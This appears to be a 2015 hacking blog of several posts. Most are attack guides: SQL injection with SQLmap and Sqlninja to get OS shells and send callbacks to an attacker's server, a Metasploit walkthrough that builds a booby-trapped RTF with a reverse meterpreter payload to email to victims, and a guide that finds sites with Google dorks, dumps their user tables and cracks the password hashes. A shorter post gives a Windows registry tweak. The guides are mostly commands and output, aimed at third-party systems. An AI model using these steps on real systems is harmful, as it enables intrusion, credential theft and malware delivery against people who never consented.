Thursday, 21 May 2015

What Is SQL Injection? And How To Use SQL Injection To Hack.

From either the scanning results or from just poking around, you might be able to identify some SQL
injections (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a full
compromise of the database or of the system itself. Two open source tools that I have found to work
most of the time are SQLmap and Sqlninja. Let’s go through the process from identification to
exploitation.

SQLmap


  • SQLmap is one of my favorite tools to use for finding SQL injections, manipulate database queries,and dump databases. It also has additional functionality to get an interactive shell through an injectionand can even spawn Meterpreter or a VNC session back to the attacker.
  • In the following examples, I’ll show both a GET parameter and a POST parameter example withSQLmap, since they are the most commonly identified types of SQLi. The reason I show both HTTPmethod attacks is that if you don’t have the request properly configured, it is very likely the attackwill fail.
  • Here is a look at the help file for SQLmap, as there are a lot of different switches that can be used forSQLi attacks: sqlmap -h

  • GET Parameter Example

     
  • In the following examples, we are going to assume that the GET parameter is where the SQLi
    vulnerability is located with the URL. We want to test every parameter and make sure that we are
    sure that the SQLi vulnerability is really a finding. There are a good number of false positives I’ve
    seen with scanner tools, so validation is really the only method of ensuring the findings. Remember
    that if you do not specific a value to test, SQLmap will test every parameter by default.
     
  • Finding if an SQL inject is valid (the result will be the banner if valid):
    sqlmap -u “http://site.com/info.php?user=test&pass=test” -b
     
  • Retrieving the database username:
    sqlmap -u “http://site.com/info.php?user=test&pass=test”—current-user
     
  • Interactive Shell
    sqlmap -u “http://site.com/info.php?user=test&pass=test”—os-shell
     
  • Some hints and tricks:
    You might need to define which type of database to attack. If you think an injection is possible but SQLmap is not finding the issue, try to set the —dbms=[database type] flag.
     
  • If you need to test an authenticated SQL injection finding, log into the website via a browser and grab the Cookie (you can grab it straight from Burp Suite). Then define the cookie using the —data=[COOKIE] switch.
     
  • Stuck? Try the command: sqlmap —wizard
     
  • POST Parameter Example

     
  • POST examples are going to mimic GET injections, except for how the vulnerable parameter is passed. Instead of being in the URL, the POST parameters are passed in the data section. This is normally seen with username and passwords as the web servers generally log GET parameters and you wouldn’t want the webserver to log passwords. Also, there are size limitations with GET methods and therefore a lot of data will be passed via POST parameters for larger applications.
     
  • Finding if an SQL inject is valid (the result will be the banner if valid):
    sqlmap -u “http://site.com/info.php “ —data= “user=test&pass=test” —b
     
  • Retrieving the database username:
    sqlmap -u “http://site.com/info.php —data= “user=test&pass=test” —current-user
     
  • Interactive Shell
    sqlmap u “http://site.com/info.php —data= “user=test&pass=test”—os-shell
     
  • If you are able to gain access to an os-shell, you’ll have full command line access as the database user. In the following example, I was able to find a vulnerable SQLi, gain an os-shell, and run an ipconfig command.
I would spend some time getting used to running different SQLi commands and trying different switches identified in the help file. If SQLmap fails, it might be your configuration, so make sure to
try using the Wizard setup, too.

 Sqlninja 

  • Sqlninja is another great SQL injection tool for uploading shells and evading network IDS systems. You might be asking why would I use Sqlninja if I’ve already become comfortable with SQLmap?
    From many years of experience, I’ve seen a large number of tests that identify SQLi with only one tool or the other. This might because how it detects blind SQLi, how they upload binaries, IPS signatures that might detect one tool or the other, or how they handle cookies. There are so many different variables and it’s smart to always double check your work.
  • Taking a look at the help file with the -h switch, we can see all the different functionality Sqlninja has.

  • The only issue I’ve had with Sqlninja, is that the configuration file is a bit more difficult to set up and I’ve never found great or easy to read documentation. So I’ll give the similar two examples from SQLmap.
     
  • In Sqlninja, you need to define the vulnerable variable to inject by using the __SQL2INJECT__command. This is different from SQLmap, where we didn’t’ need to specify which field to test against. Let’s go through a couple of examples as it should make things much more clear. Before we can use Sqlninja, we need to define the SQL configuration file. This will contain all the information about the URL, the type of HTTP method, session cookies, and browser agents.
  • Let me show you the easiest way to obtain the information required for Sqlninja. As before, load up the Burp Suite and turn the proxy intercept on the request where the vulnerable field is passed. In the following example, we are going to capture requests sent to/wfLogin.aspx and identify the POST parameter values. This is going to have most of the information required for Sqlninja injections, but slight modifications will need to be made from the Burp Raw request.
  •  Let’s take a look at one of the requests from Burp that identified a potential SQLi vulnerability.
  • In the next two examples, you’ll see how the most common GET and POST parameters are created. This can be used for any different type of HTTP method, but usually the POST and GET methods will be used.
  • Few things to notice from the original Burp request versus how it will be entered in the Sqlninja configuration file are: 
    • The HTTP Method (GET/POST) needs to be modified to include the full URL. Burp is missing the http://site.com in front of/wfLogin.aspx
     
    • You have to define which parameters to fuzz by adding the __SQL2INJECT__string.
     
    • Sometimes for Sqlninja you may need to try the attack by first closing the vulnerable SQL parameter. This can be done with ticks, quotes, or semi-colons.  
     
  • GET Parameter Example

  • We are going to write the sql_get.conf configuration file to our Kali desktop with two vulnerable parameters. Sqlninja will try to attack both the user and pass fields and try to validate if they are vulnerable. To create/modify the configuration file in a terminal, type:
  • gedit ~/Desktop/sql_get.conf
  • Enter the following into the configuration file and save it:
 —httprequest_start—
 GET http://site.com/wfLogin.aspx?
user=test’;__SQL2INJECT__&pass=test’;__SQL2INJECT__HTTP/1.0
Host: site.com
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418Firefox/1.0.8
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png,*/*
Accept-Language: en-us, en; q=0.7, it;q=0.3
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd
Connection: close
—httprequest_end—


  • POST Parameter Example

    A POST request differs from a GET in the fact that the parameters are passed in the data section instead of being part of the URL. In a terminal we need to create the configuration file and modify the
    parameters to inject into. In this example, we will inject into both the username and password:
     
  • gedit ~/Desktop/sql_post.conf
  • Enter the following into the configuration file and save it:
    —httprequest_start—
    POST http://site.com/wflogin.aspx HTTP/1.0
    Host: site.com
    User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
    Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */*
    Accept-Language: en-us, en; q=0.7, it;q=0.3
    Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7
    Content-Type: application/x-www-form-urlencoded
    Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd
    Connection: close
    username=test’;__SQL2INJECT__&password=test’;__SQL2INJECT__
    —httprequest_end—
     
  •  Executing Sqlninja

    Whether you use a GET or POST method attack, to execute your attack will be the same. Now that we created a configuration file, we can use the following command to run Sqlninja:
     
  • sqlninja -mt -f sql_get.conf
  • The following command says to run Sqlninja using the test mode to see if the injection works with the configuration file we just created. If you are lucky and do find a valid SQL injection, you can start to attack the database. In the following example, we are going to exploit our database, find the version, check to see if we are the “sa” account (who has administrative privileges), and see if we have access to a shell.






























  • Once we have xp_cmdshell available, we want to test that we have command line access and what types of privileges we have. In the example below we are exploiting the SQLi vulnerability and Testing command line commands.
  • During this specific test (image below), it looks like we might be running commands on the server, but we’d need to validate this. The issue though, is after setting up a listener on a server we own on
    the Internet, it doesn’t look like we are seeing any connections from the compromised server outbound. This could be a problem if we wanted to exfiltrate data back to us or download additional malware. Since with the command line console created by Sqlninja doesn’t show the responses from commands, we really need to validate that our commands are successfully executing.
  • The best way to check if a command is working is by putting tcp-dump to listen for pings on a server we owned publicly available on the Internet. By running ping commands on a compromised server, we can easily validate if our server is responding to pings. The reason to use pings is because ICMP is generally allowed outbound and is less likely to trigger IDS/IPS signatures. This can be configured with the following command on an external server owned by the attacker: 
  • tcpdump -nnvXSs 0 -c2 icmp
  • This command will log any pings sent to my server and I’ll be able to validate that the server can talk outbound and that my commands are working. On my compromised SQLi host I execute a simple ping back to my server. If it is successful, tcpdump will see the ICMP request.

  • Command line SQLi attacks can be run with the following command:
  • sqlninja -f [configuration_file] -m c
  • As we can see with the image below, I first tried to run telnet commands back to my server, but that was unsuccessful. I then tried to initiate ping commands back to my server, where tcpdump was listening. In this case, my attack was successful and that proved I could run full commands on this host, but it does not have web access back out.
  • In the image below, the top portion is my server logging pings and the bottom image is the victim host that is vulnerable to SQLi. Although the telnet commands seem to fail, the pings are successful.


  • If you have gotten this far and you aren’t sure what to do next, you can jump to the Lateral Pass Section to get an idea on next steps. This should give you enough details to help you start testing and practicing on vulnerable frameworks. Of course these are the best scenario options, where the SQLi works without having to configure detailed settings about the database type, blind SQLi type, or other timing type issues.

       


Wednesday, 20 May 2015

Increase Your Computer Speed By Locking (Moving) The Windows Kernel To The Ram.


Many web sites show this tweak. It loads the Windows Kernel directly into Ram memory rather than the slower Virtual Memory on the HD. You have to have enough Ram to do this. I would suggest at least 4 Gb. Some sites state you can do this with less Ram, but a lot depends on how much multi-tasking you do and how big your opens apps are.



Make a backup of your registry before attempting any change in the registry. (Be very careful in the registry as you can cause a lot of damage here that can render your PC unbootable).
Go to Start>Run. Type ‘Regedit‘ and hit enter.



Then



In the registry editor go to the following key:



HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Memory Management\DisablePagingExecutive



Double click the DisablePagingExecutive and change the value to “1“.



Then



HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Session Manager\Memory Management\LargeSystemCacheDouble click the LargeSystemCache and change the value to “1“.



Close the editor and reboot Windows. Your computer should perform faster now.

Hack Any Windows 7 Or 8 With Kali And Metasploit (.rtf Method)

Step 1: Start Metasploit

Open Terminal And Type : msfconsole

Then set Metasploit to use this exploit by typing:

command: use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof


 

Step 2: Set a Payload

We need to set a payload. In this case, we wish to use Metasploit's powerful Meterpreter to establish a listener on the victim's system. 

command: set payload windows/meterpreter/reverse_tcp

 

Step 3: Show Options

Now, let's look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let's take a look at the options for this exploit by typing: 

command: show options

 

Step 4: Change FILENAME

command: set FILENAME <Your File Name.rtf>

 

Step 5: Set Your Local Host

 

Next we need to set the LHOST or the local host. This will be the system we will be listening from--usually our local system--but it could be any system you want to listen from. We simply need to set the LHOST with the IP address of our listening system, in this case 192.168.1.107.

command: set LHOST 192.168.1.107

(If You Want To Hack Out Side Of Network Use Your Public IP)

  

Step 6: Last Check of Options

Before we exploit the victim's system, let's check to make sure all our options are set properly.

show options

Note in the screenshot that the FILENAME is now set to Kishan.rtf and the LHOST is 192.168.1.107

 

Step 7: Exploit

Now, we are ready to exploit. Simply type:

command: exploit

 You can see that Metasploit has generated a file called Kishan.rtf and placed it at /root/.msf4/local/Kishan.rtf.



Step 8: Send the File to the Victim

Now we need to send this file to the victim through email or other method. Once the victim opens the file, the Word application will hang or crash leaving us with an active session of Meterpeter on the victim's system. With an active Meterpreter session on the victim's system, we have nearly total control or "own" their system.

 

 

Hack Php Sites With SQL Injection


SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL databases. In this guide I will show you how to SQLMAP SQL Injection on Kali Linux to hack a website (more specifically Database) and extract usernames and passwords on Kali Linux.






Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results

inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=
inurl:trainers.php?id=
inurl:curriculum.php?id=
inurl:rub.php?idr=
inurl:news-full.php?id=
inurl:labels.php?id=
inurl:view_faq.php?id=
inurl:news_display.php?getid=
inurl:story.php?id=
inurl:artikelinfo.php?id=
inurl:index2.php?option=
inurl:look.php?ID=
inurl:detail.php?ID=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:index.php?=
inurl:top10.php?cat=
inurl:aboutbook.php?id=
inurl:profile_view.php?id=
inurl:newsone.php?id=
inurl:material.php?id=
inurl:category.php?id=
inurl:event.php?id=
inurl:opinions.php?id=
inurl:publications.php?id=
inurl:product-item.php?id=
inurl:announce.php?id=
inurl:fellows.php?id=
inurl:sql.php?id=
inurl:rub.php?idr=
inurl:downloads_info.php?id=
inurl:index.php?catid=
inurl:galeri_info.php?l=
inurl:prod_info.php?id=
inurl:news.php?catid=
inurl:tekst.php?idt=
inurl:shop.php?do=part&id=
inurl:index.php?id=
inurl:newscat.php?id=
inurl:productinfo.php?id=
inurl:news.php?id=
inurl:newsticker_info.php?idn=
inurl:collectionitem.php?id=
inurl:index.php?id=
inurl:rubrika.php?idr=
inurl:band_info.php?id=
inurl:trainers.php?id=
inurl:rubp.php?idr=
inurl:product.php?id=
inurl:buy.php?category=
inurl:offer.php?idf=
inurl:releases.php?id=
inurl:article.php?ID=
inurl:art.php?idm=
inurl:ray.php?id=
inurl:play_old.php?id=
inurl:title.php?id=
inurl:produit.php?id=
inurl:declaration_more.php?decl_id=
inurl:news_view.php?id=
inurl:pop.php?id=
inurl:pageid=
inurl:select_biblio.php?id=
inurl:shopping.php?id=
inurl:games.php?id=
inurl:humor.php?id=
inurl:productdetail.php?id=
inurl:page.php?file=
inurl:aboutbook.php?id=
inurl:post.php?id=
inurl:newsDetail.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:viewshowdetail.php?id=
inurl:gallery.php?id=
inurl:fiche_spectacle.php?id=
inurl:clubpage.php?id=
inurl:article.php?id=
inurl:communique_detail.php?id=
inurl:memberInfo.php?id=
inurl:show.php?id=
inurl:sem.php3?id=
inurl:section.php?id=
inurl:staff_id=
inurl:kategorie.php4?id=
inurl:theme.php?id=
inurl:newsitem.php?num=
inurl:news.php?id=
inurl:page.php?id=
inurl:readnews.php?id=
inurl:index.php?id=
inurl:shredder-categories.php?id=
inurl:top10.php?cat=
inurl:faq2.php?id=
inurl:tradeCategory.php?id=
inurl:historialeer.php?num=
inurl:show_an.php?id=
inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=
inurl:preview.php?id=
inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=
inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:forum_bds.php?num=
inurl:opinions.php?id=
inurl:channel_id=
inurl:game.php?id=
inurl:spr.php?id=
inurl:aboutbook.php?id=
inurl:view_product.php?id=
inurl:pages.php?id=
inurl:preview.php?id=
inurl:newsone.php?id=
inurl:announce.php?id=
inurl:loadpsb.php?id=
inurl:sw_comment.php?id=
inurl:clanek.php4?id=
inurl:pages.php?id=
inurl:news.php?id=
inurl:participant.php?id=


inurl:avd_start.php?avd=
inurl:download.php?id=


inurl:event.php?id=
inurl:main.php?id=


inurl:product-item.php?id=
inurl:review.php?id=


inurl:sql.php?id=
inurl:chappies.php?id=


inurl:material.php?id=
inurl:read.php?id=


inurl:clanek.php4?id=
inurl:prod_detail.php?id=


inurl:announce.php?id=
inurl:viewphoto.php?id=


inurl:chappies.php?id=
inurl:article.php?id=


inurl:read.php?id=
inurl:person.php?id=


inurl:viewapp.php?id=
inurl:productinfo.php?id=


inurl:viewphoto.php?id=
inurl:showimg.php?id=


inurl:rub.php?idr=
inurl:view.php?id=


inurl:galeri_info.php?l=
inurl:website.php?id=

Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark).
So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

 

 

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.



MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated



PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”



Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.



Run the following command on your vulnerable website with.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″)
--dbs = Enumerate DBMS databases
See screenshot below.






This commands reveals quite a few interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.



Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database got 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.



Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:



sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns



This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)



 This is exactly what we are looking for … target table user_login and user_password .

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump



Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
 

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump



TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
 
This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.



To Decrypt Password
Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:
command : hash-identifier
 
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
 
 
So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt



 
 Usuaul Hashcat was unable to determine the code for DES hash. (not in
 it’s help menu). Howeverm both cudaHashcat and oclHashcat found and 
cracked the key.
Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.